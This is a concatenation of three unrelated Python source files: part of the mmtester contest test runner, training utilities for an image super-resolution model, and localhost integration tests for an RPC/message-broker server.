headers = ['Tests\nRun'] + [f'{len(tests)}\n{name}' for name, tests in zip(group_names, group_tests)]
table = [[run_name] for run_name in runs]
total_fails = {run_name: 0 for run_name in runs}
total_bests = {run_name: 0 for run_name in runs}
total_uniques = {run_name: 0 for run_name in runs}
total_gain = {run_name: 0 for run_name in runs}
for group_no, group_test in enumerate(group_tests):
total_scores = {run_name: 0.0 for run_name in runs}
group_scale = args.scale / max(1, len(group_test)) if args.scale else 1.0
for test in group_test:
scores = process_raw_scores([run_results[test]['score'] for run_results in runs.values()], args.scoring)
best_score = max(scores)
second_best_score = sorted(scores)[-2] if len(scores) > 1 else 0
unique_best = len([score for score in scores if score == best_score]) == 1
for run_name, score in zip(runs.keys(), scores):
total_scores[run_name] += score
if group_no == 0:
total_bests[run_name] += 1 if score == best_score else 0
total_uniques[run_name] += 1 if score == best_score and unique_best else 0
total_gain[run_name] += max(0, score - second_best_score) * group_scale
total_fails[run_name] += 1 if score <= 0 else 0
for i, run_name in enumerate(runs):
table[i].append(total_scores[run_name] * group_scale)
if cfg['general']['show_bests'].lower() == 'true':
headers.append('\nBests')
for i, run_name in enumerate(runs):
table[i].append(total_bests[run_name])
if cfg['general']['show_uniques'].lower() == 'true':
headers.append('\nUniques')
for i, run_name in enumerate(runs):
table[i].append(total_uniques[run_name])
if cfg['general']['show_gain'].lower() == 'true':
headers.append('\nGain')
for i, run_name in enumerate(runs):
table[i].append(total_gain[run_name])
if cfg['general']['autohide_fails'].lower() == 'false' or max(total_fails.values()) > 0:
headers.append('\nFails')
for i, run_name in enumerate(runs):
table[i].append(total_fails[run_name])
if hasattr(tabulate, 'MIN_PADDING'):
tabulate.MIN_PADDING = 0
print(tabulate.tabulate(table, headers=headers, floatfmt=f'.{cfg["general"]["precision"]}f'))
def _main():
global args
global cfg
parser = argparse.ArgumentParser(description='Local tester for Topcoder Marathons & AtCoder Heuristic Contests\nMore help available at https://github.com/FakePsyho/mmtester')
parser.add_argument('name', type=str, nargs='?', default=None, help='name of the run')
parser.add_argument('-c', '--config', type=str, default=DEFAULT_CONFIG_PATH, help='path to cfg file')
parser.add_argument('-t', '--tests', type=str, help='number of tests to run, range of seeds (e.g. A-B) or the name of the JSON/text file with the list of seeds')
parser.add_argument('-m', '--threads_no', type=int, help='number of threads to use')
parser.add_argument('-p', '--progress', action='store_true', help='shows current progress when testing')
parser.add_argument('-a', '--tester_arguments', type=str, default='', help='additional arguments for the tester')
parser.add_argument('-b', '--benchmark', type=str, default=None, help='benchmark res file to test against')
parser.add_argument('-s', '--show', action='store_true', help='shows current results')
parser.add_argument('--config-load', type=str, help='creates a new config based on specified template config')
parser.add_argument('--config-save', type=str, help='updates a template config with local config')
parser.add_argument('--config-delete', type=str, help='permanently deletes stored template config')
parser.add_argument('--config-list', action='store_true', help='lists available template configs')
parser.add_argument('--data', type=str, default=None, help='file with metadata, used for grouping and filtering; in order to always use latest results file set it to LATEST')
parser.add_argument('--filters', type=str, default=None, nargs='+', help='filters results based on criteria')
parser.add_argument('--groups', type=str, default=None, nargs='+', help='groups results into different groups based on criteria')
parser.add_argument('--scale', type=float, help='sets scaling of results')
parser.add_argument('--scoring', type=str, default=None, help='sets the scoring function used for calculating ranking')
parser.add_argument('--sorting', type=str, default=None, choices=['name', 'date'], help='sets how the show runs are sorted')
parser.add_argument('--find', type=str, default=None, nargs='+', help='usage: --find res_file var[+/-] [limit]; sorts tests by var (asceding / descending) and prints seeds; can be combined with --filters; you can use LATEST for res_file')
parser.add_argument('--generate-scripts', action='store_true', help='generates scripts defined in the config file')
parser.add_argument('--ip', type=str, default=None, help='optional argument for --generate-scripts')
parser.add_argument('--source', type=str, default=None, help='optional argument for --generate-scripts')
args = parser.parse_args()
if args.config_load:
args.config_load += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_load)
if not os.path.exists(template_config):
fatal_error(f'Missing {args.config_load} template config file')
if os.path.exists(args.config):
fatal_error(f'Config file {args.config} already exists')
print(f'Creating new config file at {args.config}')
shutil.copy(template_config, os.path.join(os.getcwd(), args.config))
sys.exit(0)
if args.config_save:
args.config_save += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_save)
assert os.path.exists(args.config)
print(f'Updating {args.config_save} template config with {args.config}')
# if os.path.exists(template_config):
# print('Template config file {args.config_save} already exists, do you wish to overwrite it?')
shutil.copy(os.path.join(os.getcwd(), args.config), template_config)
sys.exit(0)
if args.config_delete:
args.config_delete += '.cfg'
template_config = os.path.join(os.path.dirname(__file__), args.config_delete)
if not os.path.exists(template_config):
fatal_error(f'Missing {args.config_delete} template config file')
print(f'Removing template config file {args.config_delete}')
os.remove(template_config)
sys.exit(0)
if args.config_list:
template_configs = glob.glob(f'{os.path.dirname(__file__)}/*.cfg')
table = []
for template_config in template_configs:
cfg = configparser.ConfigParser()
cfg.read(template_config)
table += [[os.path.splitext(os.path.basename(template_config))[0], cfg['general']['description']]]
print('Available template config files:')
print(tabulate.tabulate(table, headers=['name', 'description']))
sys.exit(0)
if not os.path.exists(args.config):
fatal_error([f"Missing config file {args.config}, either use correct config file with \"mmtester -c config_file\" or create a new config file with \"mmtester --config-load config_template\"",
"If you don't know how to use mmtester, please check out the github project readme at: https://github.com/FakePsyho/mmtester"])
cfg = configparser.ConfigParser(interpolation=None)
cfg.read(args.config)
if cfg['general']['version'] != __version__:
fatal_error([f"{args.config} version ({cfg['general']['version']}) doesn't match the current version of mmtester {__version__}",
"Unfortunately mmtester is currently not backwards compatible with old config files",
"The easiest way to resolve the problem is to manually update your config file with changes introduced in the new version (create a new config file with --new-config)",
"Alternatively, you can downgrade your version of mmtester to match the config file"])
# XXX: probably there's a better way to do this
def convert(value, type=str):
if value is None or value == '':
return None
if type == bool:
return value.lower() in ['true', 'yes']
return type(value)
args.tests = try_str_to_numeric(args.tests or convert(cfg['default']['tests']))
args.threads_no = args.threads_no or convert(cfg['default']['threads_no'], int)
args.progress = args.progress or convert(cfg['default']['progress'], bool)
args.benchmark = args.benchmark or convert(cfg['default']['benchmark'])
args.tester_arguments = args.tester_arguments or cfg['default']['tester_arguments']
args.data = args.data or cfg['default']['data']
args.scale = args.scale or convert(cfg['default']['scale'], float)
args.scoring = args.scoring or convert(cfg['default']['scoring'])
args.sorting = args.sorting or convert(cfg['default']['sorting'])
# Mode: Generate Scripts
if args.generate_scripts:
print('Functionality temporarily disable')
sys.exit(0)
print('Generating Scripts')
for script_name in cfg['scripts']:
script = cfg.get('scripts', script_name, raw=True)
undefined = []
if '%RUN_CMD%' in script:
script = script.replace('%RUN_CMD%', cfg['general']['run_cmd'])
if '%EXEC%' in script:
if not args.exec:
undefined.append('missing %ECEC% (use --exec EXEC)')
else:
script = script.replace('%EXEC%', args.exec)
if '%IP%' in script:
if not args.ip:
undefined.append('missing %IP% (use --ip IP)')
else:
script = script.replace('%IP%', args.ip)
if '%SOURCE%' in script:
if not args.source:
undefined.append('missing %SOURCE% (use --source SOURCE)')
else:
script = script.replace('%SOURCE%', args.source)
if undefined:
print(f'Ignoring script {script_name} because of {undefined}')
continue
with open(script_name, 'w') as f:
for i, line in enumerate(script.split('\\n')):
prefix = f'{script_name} ='
print(prefix if i == 0 else ' ' * len(prefix), line)
print(line, file=f)
sys.exit(0)
# Mode: Find
if args.find:
assert len(args.find) in [2, 3]
assert args.find[1][-1] in ['-', '+']
if args.find[0] == 'LATEST':
results_files = find_res_files(cfg['general']['results_dir'])
_, args.find[0] = sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))[-1]
else:
args.find[0] += cfg['general']['results_ext']
results = load_res_file(args.find[0])
tests = results.keys()
for filter in args.filters or []:
tests = apply_filter(tests, results, filter)
var = args.find[1][:-1]
ascending = args.find[1][-1] == '+'
ordered_tests = [test for _, test in sorted(zip([results[test][var] for test in tests], tests), reverse=not ascending)]
if len(args.find) == 3:
ordered_tests = ordered_tests[:int(args.find[2])]
print(f'Finding in {args.find[0]} file')
for test in ordered_tests:
print(json.dumps(results[test]))
sys.exit(0)
# Parse args.tests
if args.tests is None:
pass
elif isinstance(args.tests, int):
args.tests = list(range(1, args.tests + 1))
elif re.search('[a-zA-Z]', args.tests):
if not os.path.exists(args.tests):
fatal_error(f'Cannot locate {args.tests} file')
with open(args.tests) as f:
lines = f.read().splitlines()
assert len(lines) > 0
if isinstance(try_str_to_numeric(lines[0]), int):
args.tests = [int(line) for line in lines]
else:
args.tests = [json.loads(line)['id'] for line in lines]
else:
assert '-' in args.tests
lo, hi = args.tests.split('-')
lo = try_str_to_numeric(lo)
hi = try_str_to_numeric(hi)
args.tests = list(range(lo, hi + 1))
# Mode: Summary
if args.show:
results_files = find_res_files(cfg['general']['results_dir'])
if not results_files:
fatal_error(f'There are no results files in the results folder: {cfg["general"]["results_dir"]}')
if args.sorting == 'name':
results_files = sorted(results_files)
elif args.sorting == 'date':
results_files = [result_file for _, result_file in sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))]
results = {os.path.basename(file).split('.')[0]: load_res_file(file) for file in results_files}
if args.data == 'LATEST':
_, args.data = sorted(zip([os.path.getmtime(result_file) for result_file in results_files], results_files))[-1]
data_file = load_res_file(args.data) if args.data and os.path.isfile(args.data) else None
show_summary(results, tests=args.tests, data=data_file, groups=args.groups, filters=args.filters)
sys.exit(0)
# Mode: Run tests
if not os.path.exists(cfg['general']['tests_dir']):
os.mkdir(cfg['general']['tests_dir'])
if not args.tests:
fatal_error('You need to specify tests to run, use --tests option')
assert args.threads_no >= 1
fout = sys.stdout
if args.name:
os.makedirs(cfg["general"]["results_dir"], exist_ok=True)
fout = open(f'{cfg["general"]["results_dir"]}/{args.name}{cfg["general"]["results_ext"]}', 'w')
inputs_path = {}
if cfg["general"]["cmd_generator"]:
# generate input files
print('Generating test cases...', file=sys.stderr)
gen_seeds = []
if cfg['general']['generator_cache'].lower() == 'true':
os.makedirs('inputs', exist_ok=True)
inputs_path = {seed: f'inputs/{seed}.in' for seed in args.tests}
present_inputs = set([path for path in os.listdir('inputs') if os.path.isfile(f'inputs/{path}')])
gen_seeds = [seed for seed in args.tests if f'{seed}.in' not in present_inputs]
else:
inputs_path = {seed: f'in/{i:04d}.txt' for i, seed in enumerate(args.tests)}
gen_seeds = args.tests
if gen_seeds:
seeds_path = 'mmtester_seeds.txt'
with open(seeds_path, 'w') as f:
f.write('\n'.join([str(seed) for seed in gen_seeds]))
subprocess.run(f'{cfg["general"]["cmd_generator"]} {seeds_path}', shell=True)
if cfg['general']['generator_cache'].lower() == 'true':
for i, seed in enumerate(gen_seeds):
shutil.copy(f'in/{i:04d}.txt', f'inputs/{seed}.in')
#TODO: add error handling/warning for benchmark file (file not existing, no full test coverage)
benchmark = load_res_file(args.benchmark + cfg['general']['results_ext']) if args.benchmark else None
try:
start_time = time.time()
for id in args.tests:
tests_queue.put({'seed': id, 'path': inputs_path.get(id, None)})
tests_left = args.tests
def worker_loop():
while True:
try:
seed = tests_queue.get(False)
result = run_test(seed)
results_queue.put(result)
except queue.Empty:
return
except:
traceback.print_exc()
fatal_error('One of the worker threads encountered an error', exit_main=True);
workers = [Thread(target=worker_loop) for _ in range(args.threads_no)]
for worker in workers:
worker.start()
sum_scores = 0
log_scores = 0
benchmark_log_scores = 0
results = {}
processed = 0
while tests_left:
result = results_queue.get()
results[result['id']] = result
assert result['id'] in tests_left
while tests_left and tests_left[0] in results:
processed += 1
seed = tests_left[0]
print(json.dumps(results[seed]), file=fout, flush=True)
tests_left = tests_left[1:]
sum_scores += results[seed]['score'] if results[seed]['score'] > 0 else 0
log_scores += math.log(results[seed]['score']) if results[seed]['score'] > 0 else 0
if args.progress and args.name:
output = f'Progress: {processed} / {processed+len(tests_left)} Time: {time.time() - start_time : .3f}'
if args.benchmark:
benchmark_log_scores += math.log(benchmark[seed]['score'] if benchmark[seed]['score'] > 0 else 0)
output += f' Scores: {log_scores / processed : .6f} vs {benchmark_log_scores / processed : .6f}'
print(f'\r{output} ', end='', file=sys.stderr)
sys.stderr.flush()
time.sleep(0.001)
except KeyboardInterrupt:
print('\nInterrupted by user', file=sys.stderr)
os._exit(1)
print(file=sys.stderr)
print("Time:", time.time() - start_time, file=sys.stderr)
print("Avg Score:", sum_scores / len(results), file=sys.stderr)
print("Avg Log Scores:", log_scores / len(results), file=sys.stderr)
if __name__ == '__main__':
_main()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
"""start the timer"""
self.t0 = time.time()
def toc(self, restart=False):
"""
get the time interval
:param restart: if True, restart the timer
:return:
"""
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
"""accumulate the time interval"""
self.acc += self.toc()
def release(self):
"""get the accumulation of time interval"""
ret = self.acc
self.acc = 0
return ret
def reset(self):
"""reset the accumulation"""
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
print("args.load=", args.load)
print("args.save=", args.save)
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
print(self.dir, os.path.exists(self.dir), args.load)
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
label = 'SR on {}'.format(self.args.data_test[0])
fig = plt.figure()
plt.title(label)
plt.plot(
axis,
self.log[:].numpy(),
label='Scale {}'.format(self.args.scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(self.args.data_test[0])))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
if self.args.results_dir == "":
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
filename
)
else:
filename = os.path.join(self.args.results_dir, filename)
postfix = ('_h_Res', '_l', '_h_GT')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}.bmp'.format(filename.replace('_l', p)), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
# milestones = list(map(lambda x: int(x), args.decay.split('-')))
# kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
# scheduler_class = lrs.MultiStepLR
kwargs_scheduler = {
'mode': "max",
'verbose': True,
'factor': args.ms_factor,
'patience': args.ms_patience,
'threshold': 1e-4,
'threshold_mode': 'rel',
'cooldown': 0,
'min_lr': 1e-8,
'eps': 1e-6
}
scheduler_class = optim.lr_scheduler.ReduceLROnPlateau
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir), args.cuda))
self.scheduler.last_epoch = epoch - 1
# if epoch > 1:
# for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self, loss):
self.scheduler.step(loss)
def get_lr(self):
return self.state_dict().get('param_groups')[0].get('lr')
def get_last_epoch(self):
return self.scheduler.last_epoch + 1
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
main4.py
|
import time
import threading
import requests
L = 'http://localhost:8001'
TIMEOUT = 5
def make_request(method):
method = getattr(requests, method)
def req(path, *a, type=None, headers=None, **kw):
if 'timeout' not in kw:
kw['timeout'] = TIMEOUT
if type:
if not headers:
headers = {}
headers['Type'] = type
return method(L + path, *a, headers=headers, **kw)
return req
post = make_request('post')
get = make_request('get')
def mem(links):
if not isinstance(links, list):
links = [links]
def get_memory():
return int(get('/debug').text.split(': ')[1])
def inner(fn):
def wrapper():
for link in links:
post(link, type='create')
post(link, type='delete')
time.sleep(0.6)
mem = get_memory()
fn()
for link in links:
post(link, type='delete')
time.sleep(0.6)
assert mem == get_memory()
return wrapper
return inner
@mem('/test/cmd1')
def test_default():
clients = [None, None]
def _request(i):
time.sleep(0.1 * i)
clients[i - 1] = post('/test/cmd1', json={'id': i, 'params': 'ubuntu'})
threading.Thread(target=_request, args=(1,)).start()
threading.Thread(target=_request, args=(2,)).start()
worker = get('/test/cmd1', type='get')
assert worker.status_code == 200
request = worker.json()
assert request['id'] == 1
assert request['params'] == 'ubuntu'
assert post('/rpc/result', json={'id': 1, 'result': 'linux'}).status_code == 200
time.sleep(0.1)
assert clients[0].status_code == 200
response = clients[0].json()
assert response['id'] == 1
assert response['result'] == 'linux'
assert clients[1] is None
worker = get('/test/cmd1', type='get')
assert worker.status_code == 200
request = worker.json()
assert request['id'] == 2
assert request['params'] == 'ubuntu'
assert post('/rpc/result', json={'id': 2, 'result': 'unix'}).status_code == 200
time.sleep(0.1)
assert clients[1].status_code == 200
response = clients[1].json()
assert response['id'] == 2
assert response['result'] == 'unix'
@mem('/one')
def test_request_without_id():
def run_worker():
r = get('/one', type='get')
post('/' + r.headers['id'], json={'result': 'ok'}, type='result')
threading.Thread(target=run_worker).start()
time.sleep(0.1)
r = post('/one', json={'params': 1})
assert r.status_code == 200
assert r.json()['result'] == 'ok'
@mem('/test/worker')
def test_worker_mode():
def worker():
s = requests.Session()
task = s.post(L + '/test/worker', json={'info': 'test for worker mode'}, headers={'Type': 'worker'}).json()
while True:
time.sleep(0.1)
if task.get('stop'):
break
task = s.post(L, json={'result': sum(task['nums'])}).json()
threading.Thread(target=worker).start()
time.sleep(0.1)
result = post('/test/worker', json={'nums': [1]}).json()
assert result['result'] == 1
result = post('/test/worker', json={'nums': [1, 3, 5]}).json()
assert result['result'] == 9
result = post('/test/worker', json={'nums': [7, 11, 13, 17]}).json()
assert result['result'] == 48
r = post('/test/worker', json={'stop': True})
assert r.status_code == 503
r = post('/rpc/details').json()
assert r['test/worker']['info'] == 'test for worker mode'
@mem(['/pattern/*', '/task/revert'])
def test_pattern():
h_response = None
def worker():
nonlocal h_response
s = requests.Session()
r = s.get(L + '/pattern/*', headers={'Type': 'worker'})
while True:
name = r.headers['name'][8:]
time.sleep(0.1)
if not name:
r = s.post(L, data=b'sum,mul,stop')
continue
if name == 'sum':
task = r.json()
response = {'result': sum(task['value'])}
elif name == 'mul':
task = r.json()
response = {'result': task['value'][0] * task['value'][1]}
elif name == 'stop':
r = s.post(L, json={'result': 'ok'}, headers={'Option': 'stop'})
break
else:
response = {'error': 'no method'}
r = s.post(L, json=response)
time.sleep(0.2)
h_response = s.post('http://localhost:8001/task/revert', json={'id': 12345}).json()
threading.Thread(target=worker).start()
time.sleep(0.1)
assert get('/pattern/').text == 'sum,mul,stop'
r = post('/pattern/sum', json={'value': [1, 2, 3, 4]})
assert r.json()['result'] == 10
r = post('/pattern/mul', json={'value': [3, 5]})
assert r.json()['result'] == 15
r = post('/pattern/typo', json={'value': [3, 5]})
assert r.json()['error'] == 'no method'
r = post('/pattern/stop')
assert r.status_code == 200
assert r.json()['result'] == 'ok'
error = None
try:
get('/pattern/', timeout=0.1)
except Exception as e:
error = e
assert isinstance(error, requests.exceptions.ReadTimeout)
task = get('/task/revert', type='get').json()
assert task['id'] == 12345
post('/12345', json={'result': 'ok'}, type='result')
time.sleep(0.1)
assert h_response['result'] == 'ok'
@mem('/test4/*')
def test4():
h_response = None
def worker():
nonlocal h_response
s = requests.Session()
s.get(L + '/test4/*', headers={'Type': 'worker'})
s.post(L, data=b'sum,mul,stop')
threading.Thread(target=worker).start()
time.sleep(0.1)
assert get('/test4/').text == 'sum,mul,stop'
r = post('/test4/sum', json={'value': [1, 2, 3, 4]})
assert r.status_code == 503
def run(delay):
def wrapper(fn):
def wr():
if delay:
time.sleep(delay)
fn()
th = threading.Thread(target=wr)
th.start()
return wrapper
@mem('/test6')
def test6_priority():
result = []
@run(0)
def worker():
worker = requests.Session()
task = worker.post(L + '/test6', headers={'Type': 'get+'}).json()
worker.post(L, json={'result': task['request']}, headers={'X-Type': 'result'}, timeout=TIMEOUT)
time.sleep(0.1)
response = post('/test6', json={'request': 0}).json()
result.append(response['result'])
def request(delay, value, priority=0):
@run(delay)
def send():
headers = {}
if priority:
headers['Priority'] = str(priority)
response = post('/test6', json={'request': value}, headers=headers).json()
result.append(response['result'])
request(0.1, 1)
request(0.2, 2, 5)
request(0.3, 3, -5)
request(0.4, 4, 3)
request(0.5, 5, -3)
request(0.6, 6, 1)
request(0.7, 7, -1)
request(0.8, 8)
request(0.9, 9, 4)
time.sleep(1.2)
details = post('/rpc/details').json()
assert details['test6']['clients'] == 9
worker = requests.Session()
for _ in range(9):
task = worker.post(L + '/test6', headers={'Type': 'get+'}, timeout=TIMEOUT).json()
worker.post(L, json={'result': task['request']}, headers={'Type': 'result'}, timeout=TIMEOUT)
time.sleep(0.05)
time.sleep(0.5)
assert result == [0, 2, 9, 4, 6, 1, 8, 7, 5, 3]
@mem('/test7/async')
def test7_async():
is_async = False
data = None
@run(0)
def first():
nonlocal is_async, data
r = post('/test7/async', headers={'Type': 'get'})
is_async = r.headers.get('Async') == 'true'
data = r.text
time.sleep(0.1)
r = post('/test7/async', headers={'Type': 'async'}, data='test7')
assert r.status_code == 200
time.sleep(0.1)
assert is_async
assert data == 'test7'
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
for i in range(10):
r = post('/test7/async', headers={'Type': 'async'}, data='test_' + str(i))
assert r.status_code == 200
time.sleep(0.01)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 10
for i in range(10):
r = post('/test7/async', headers={'Type': 'get'})
assert r.headers.get('Async') == 'true'
assert r.text == 'test_' + str(i)
time.sleep(0.2)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
for i in range(10):
time.sleep(i*0.02)
@run(0)
def worker():
r = post('/test7/async', headers={'Type': 'get'})
assert r.headers.get('Async') == 'true'
assert r.text == 'test_' + str(i)
time.sleep(0.1)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 10
assert details['test7/async']['clients'] == 0
for i in range(10):
r = post('/test7/async', headers={'Type': 'async'}, data='test_' + str(i))
assert r.status_code == 200
time.sleep(0.01)
details = post('/rpc/details').json()
assert details['test7/async']['workers'] == 0
assert details['test7/async']['clients'] == 0
@mem('/test7/async2')
def test7_async_worker():
result = 0
count = 0
check = None
@run(0)
def worker():
nonlocal result, count, check
s = requests.Session()
r = s.get(L + '/test7/async2', headers={'Type': 'worker'})
while True:
assert r.status_code == 200
if r.content == b'stop':
r = s.post(L, headers={'Option': 'stop'})
assert r.status_code == 200
break
#assert r.headers.get('Async') == 'true'
result += r.json()['data']
if result == 0:
time.sleep(0.5)
check = post('/rpc/details').json()
count += 1
r = s.get(L)
result += 1000
time.sleep(0.1)
s = requests.Session()
for i in range(15):
if i == 7:
time.sleep(1)
check2 = post('/rpc/details').json()
r = s.post(L + '/test7/async2', json={'data': i}, headers={'Type': 'async'})
assert r.status_code == 200
s.post(L + '/test7/async2', data=b'stop')
time.sleep(0.2)
check3 = post('/rpc/details').json()
assert count == 15
assert result == 1105
assert check['test7/async2']['clients'] == 6
assert check['test7/async2']['workers'] == 0
assert check2['test7/async2']['clients'] == 0
assert check2['test7/async2']['workers'] == 1
assert check3['test7/async2']['clients'] == 0
assert check3['test7/async2']['workers'] == 0
@mem('/test8')
def test8_worker_id():
def go(sleep, name, id=None):
@run(sleep)
def worker():
s = requests.Session()
headers = {'Type': 'get+'}
if id:
headers['Set-ID'] = str(id)
r = s.get(L + '/test8', headers=headers)
s.post(L, json={'name': name}, headers={'Type': 'result'})
go(0, 'linux')
go(0.1, 'windows')
go(0.2, 'freebsd', 2000000)
go(0.3, 'macos')
go(0.4, 'unix', 1000000)
go(0.5, 'redhat')
go(0.6, 'ubuntu')
time.sleep(1)
d = get('/rpc/details').json()['test8']
workers = list(map(str, d['worker_ids']))
assert get('/test8', headers={'Worker-ID': workers[3]}).json()['name'] == 'macos'
assert get('/test8', headers={'Worker-ID': workers[1]}).json()['name'] == 'windows'
assert get('/test8', headers={'Worker-ID': workers[5]}).json()['name'] == 'redhat'
del workers[5]
del workers[3]
del workers[1]
d = get('/rpc/details').json()['test8']
assert workers == list(map(str, d['worker_ids']))
assert get('/test8', headers={'Worker-ID': '1000000'}).json()['name'] == 'unix'
assert get('/test8', headers={'Worker-ID': '2000000'}).json()['name'] == 'freebsd'
assert len(get('/rpc/details').json()['test8']['worker_ids']) == 2
assert get('/test8').json()['name'] == 'linux'
assert get('/test8').json()['name'] == 'ubuntu'
assert len(get('/rpc/details').json()['test8']['worker_ids']) == 0
time.sleep(0.1)
@mem('/test8')
def test8_worker_id2():
c0 = None
w0 = None
@run(0)
def worker():
nonlocal w0
w0 = get('/test8', type='get')
post('/' + w0.headers['id'], type='result', json={'result': 'w0'})
@run(0.1)
def client():
nonlocal c0
c0 = get('/test8', headers={'Worker-ID': 'worker-id:5'}, json={'data': 'c0'})
time.sleep(0.5)
assert c0 is None and w0 is None
details = get('/rpc/details').json()['test8']
assert details['workers'] == 1
assert details['clients'] == 1
c1 = get('/test8', json={'data': 'c1'})
assert c1.json()['result'] == 'w0'
assert w0.json()['data'] == 'c1'
assert c0 is None
details = get('/rpc/details').json()['test8']
assert details['workers'] == 0
assert details['clients'] == 1
w1 = get('/test8', type='get', headers={'Set-ID': 'worker-id:5'})
assert w1.json()['data'] == 'c0'
post('/' + w1.headers['id'], type='result', json={'result': 'w1'})
time.sleep(0.1)
assert c0.json()['result'] == 'w1'
@mem('/test9/pub')
def test9_pubsub():
error = 0
stopped = 0
r_sum = [0] * 6
def go(type, index):
@run(0)
def worker_get():
nonlocal error, stopped
if type == 'get':
get = requests.get
else:
s = requests.Session()
get = s.get
while True:
r = get(L + '/test9/pub', headers={'Type': type})
if not r.headers['Async']:
error += 1
msg = r.json()
if msg['data'] == 'stop':
break
r_sum[index] += msg['data']
time.sleep(0.1)
stopped += 1
go('get', 0)
go('get', 1)
go('get+', 2)
go('get+', 3)
go('worker', 4)
go('worker', 5)
s = requests.Session()
def client(data):
r = s.post(L + '/test9/pub', headers={'Type': 'pub'}, json=data)
assert r.status_code == 200
time.sleep(0.2)
client({'data': 1})
time.sleep(0.2)
assert r_sum == [1, 1, 1, 1, 1, 1]
client({'data': 2})
time.sleep(0.2)
assert r_sum == [3, 3, 3, 3, 3, 3]
client({'data': 3})
client({'data': 4})
client({'data': 5})
client({'data': 6})
client({'data': 7})
time.sleep(0.7)
